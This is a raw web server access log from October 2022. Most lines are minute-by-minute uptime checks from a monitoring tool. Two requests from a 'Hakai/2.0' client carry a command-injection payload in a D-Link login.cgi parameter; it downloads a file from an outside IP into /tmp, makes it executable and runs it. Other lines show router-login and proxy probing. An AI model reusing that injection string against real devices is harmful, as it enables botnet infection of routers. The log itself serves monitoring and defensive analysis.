212.91.246.72 - - [04/Oct/2022:10:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.31.46.179 - - [04/Oct/2022:10:59:01 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2022:10:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:11:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:11:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.68.105.241 - - [04/Oct/2022:11:02:15 +0200] "CONNECT is.muni.cz:443 HTTP/1.1" 405 340 "-" "Java/1.8.0_312"
212.91.246.72 - - [04/Oct/2022:11:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:11:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.40.165.4 - - [04/Oct/2022:11:04:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
87.17.240.139 - - [04/Oct/2022:11:04:35 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:11:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:11:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.111.241 - - [04/Oct/2022:11:06:32 +0200] "MGLNDD_212.91.246.88_80" 501 338 "-" "-"
198.199.111.241 - - [04/Oct/2022:11:06:34 +0200] "MGLNDD_212.91.246.82_80" 501 338 "-" "-"
87.17.240.139 - - [04/Oct/2022:11:06:49 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:11:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
